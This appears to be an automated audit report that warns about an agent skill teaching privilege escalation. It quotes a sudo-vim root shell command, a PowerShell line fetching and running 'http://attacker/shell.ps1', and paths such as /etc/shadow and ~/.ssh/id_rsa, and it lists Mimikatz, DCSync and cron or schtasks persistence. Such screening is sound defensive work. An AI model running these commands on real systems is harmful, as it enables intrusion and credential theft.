Privilege Escalation Methods

Warn

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: MEDIUM
COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, CREDENTIALS_UNSAFE, DATA_EXFILTRATION, EXTERNAL_DOWNLOADS
Full Analysis
  • [Privilege Escalation] (HIGH): The skill provides explicit commands to gain root/administrator access, including exploiting misconfigured sudo permissions (e.g., vim, find, awk), abusing SUID binaries and capabilities, and Windows token impersonation. Examples: "sudo vim -c ':!/bin/bash'" and "execute-assembly sweetpotato.exe".
  • [Remote Code Execution] (HIGH): The skill contains a remote script execution pattern using PowerShell's IEX: "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'". This allows an attacker to download and execute arbitrary code directly in memory, without writing it to disk.
  • [Credential Exposure & Exfiltration] (HIGH): Provides methods for stealing sensitive data and credentials, such as copying the Active Directory database ('ntds.dit'), dumping LSA secrets via Mimikatz, and performing DCSync attacks. It also accesses sensitive paths like '/etc/shadow' and '~/.ssh/id_rsa'.
  • [Persistence Mechanisms] (HIGH): Includes instructions for maintaining long-term access to a compromised system, such as creating malicious scheduled tasks ('schtasks /create') and injecting payloads into cron scripts.
  • [External Downloads] (MEDIUM): References several external offensive tools (Mimikatz, Rubeus, Impacket, BloodHound, etc.) that are commonly used in malicious activity and are typically flagged by endpoint security controls.
Audit Metadata
Risk Level: MEDIUM
Analyzed: Feb 17, 2026, 06:04 PM